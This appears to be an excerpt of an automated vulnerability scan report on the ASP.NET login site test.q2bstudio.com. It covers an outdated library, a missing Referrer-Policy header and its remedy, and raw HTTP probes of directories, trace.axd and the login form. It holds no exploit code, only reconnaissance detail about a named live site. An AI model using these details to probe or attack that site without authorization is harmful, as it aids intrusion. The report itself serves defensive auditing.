http://test.q2bstudio.com/

Identified Version

2.5.1

Latest Version

2.24.0 (in this branch)

Vulnerability Database

Result is based on 04/05/2019 16:30:00 vulnerability database content.

Certainty

Request

POST / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 160
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

btnResetPass=%c2%bfOlvidaste+tu+contrase%c3%b1a%3f&username_id=Smith&__VIEWSTATE=IL&__VIEWSTATE_KEY=VS_52.143.173.9_637159022021935337&password_id=N3tsp%40rker-

Response

HTTP/1.1 200 OK
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3216
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:32 GMT
Cache-Control: private



<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie9 gt-ie8"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="gt-ie8 gt-ie9 not-ie">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="shortcut icon" href="Resources/logo/logo_vc.png" />
<!-- Open Sans font from Google CDN -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin" rel="stylesheet" type="text/css">

<!-- Pixel Admin's stylesheets -->
<link href="assets/stylesheets/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pixel-admin.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pages.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/rtl.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/themes.min.css" rel="stylesheet" type="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'+"<"+"/script>"); </script>
<![endif]-->


<!-- Pixel Admin's javascripts -->
<script src="assets/javascripts/bootstrap.min.js"></script>


20. Referrer-Policy Not Implemented

11 TOTAL
BEST PRACTICE

pentestonline.es detected that no Referrer-Policy header implemented.

Referrer-Policy is a security header designed to prevent cross-domain Referer leakage. 

Impact

Referer header is a request header that indicates the site which the traffic originated from. If there is no adequate prevention in place, the  URL itself, and even sensitive information contained in the URL will be leaked to the cross-site.

The lack of Referrer-Policy header might affect privacy of the users and site's itself

Actions to Take

In a response header:

Referrer-Policy: no-referrer | same-origin | origin | strict-origin | no-origin-when-downgrading 

In a META tag

<meta name="Referrer-Policy" value="no-referrer | same-origin"/>

In an element attribute

<a href="http://crosssite.example.com" rel="noreferrer"></a> 

or

<a href="http://crosssite.example.com" referrerpolicy="no-referrer | same-origin | origin | strict-origin | no-origin-when-downgrading"></a>

Remedy

Please implement a Referrer-Policy by using the Referrer-Policy response header or by declaring it in the meta tags. It’s also possible to control referrer information over an HTML-element by using the rel attribute.

External References

Classification

OWASP 2017-A3

20.1. http://test.q2bstudio.com/

http://test.q2bstudio.com/

Certainty

Request

GET / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Set-Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; path=/; HttpOnly
Set-Cookie: q2blng=ca-ES; expires=Wed, 05-Feb-2020 12:43:22 GMT; path=/
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3261
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:22 GMT
Cache-Control: private



<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie9 gt-ie8"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="gt-ie8 gt-ie9 not-ie">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="shortcut icon" href="Resources/logo/logo_vc.png" />
<!-- Open Sans font from Google CDN -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin" rel="stylesheet" type="text/css">

<!-- Pixel Admin's stylesheets -->
<link href="assets/stylesheets/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pixel-admin.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pages.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/rtl.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/themes.min.css" rel="stylesheet" type="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'

20.2. http://test.q2bstudio.com/assets/javascripts/

http://test.q2bstudio.com/assets/javascripts/

Certainty

Request

GET /assets/javascripts/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

20.3. http://test.q2bstudio.com/Resources/logo/

http://test.q2bstudio.com/Resources/logo/

Certainty

Request

GET /Resources/logo/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

20.4. http://test.q2bstudio.com/assets/stylesheets/

http://test.q2bstudio.com/assets/stylesheets/

Certainty

Request

GET /assets/stylesheets/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

20.5. http://test.q2bstudio.com/assets/

http://test.q2bstudio.com/assets/

Certainty

Request

GET /assets/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

20.6. http://test.q2bstudio.com/assets/demo/themes/

http://test.q2bstudio.com/assets/demo/themes/

Certainty

Request

GET /assets/demo/themes/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

20.7. http://test.q2bstudio.com/assets/demo/

http://test.q2bstudio.com/assets/demo/

Certainty

Request

GET /assets/demo/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

20.8. http://test.q2bstudio.com/Resources/

http://test.q2bstudio.com/Resources/

Certainty

Request

GET /Resources/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

20.9. http://test.q2bstudio.com/Resources/images/

http://test.q2bstudio.com/Resources/images/

Certainty

Request

GET /Resources/images/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

20.10. http://test.q2bstudio.com/trace.axd

http://test.q2bstudio.com/trace.axd

Certainty

Request

GET /trace.axd HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/trace.axd
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
X-Powered-By: ASP.NET
Content-Length: 3400
Content-Type: text/html; charset=utf-8
Date: Wed, 29 Jan 2020 12:43:33 GMT
Cache-Control: private

<!DOCTYPE html>
<html>
<head>
<title>Trace Error</title>
<meta name="viewport" content="width=device-width" />
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
@media screen and (max-width: 639px) {
pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; }
}
@media screen and (max-width: 479px) {
pre { width: 280px; }
}
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Trace Error</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>The current trace settings prevent trace.axd from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
<br><br>

<b>Details:</b> To enable trace.axd to be viewable on remote machines, please create a &lt;tra

20.11. http://test.q2bstudio.com/

http://test.q2bstudio.com/

Certainty

Request

POST / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 160
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

btnResetPass=%c2%bfOlvidaste+tu+contrase%c3%b1a%3f&username_id=Smith&__VIEWSTATE=IL&__VIEWSTATE_KEY=VS_52.143.173.9_637159022021935337&password_id=N3tsp%40rker-

Response

HTTP/1.1 200 OK
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3216
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:32 GMT
Cache-Control: private



<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie9 gt-ie8"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="gt-ie8 gt-ie9 not-ie">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="shortcut icon" href="Resources/logo/logo_vc.png" />
<!-- Open Sans font from Google CDN -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin" rel="stylesheet" type="text/css">

<!-- Pixel Admin's stylesheets -->
<link href="assets/stylesheets/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pixel-admin.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pages.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/rtl.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/themes.min.css" rel="stylesheet" type="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'+"<"+"/script>"); </script>
<![endif]-->


<!-- Pixel Admin's javascripts -->
<script src="assets/javascripts/bootstrap.min.js"></script>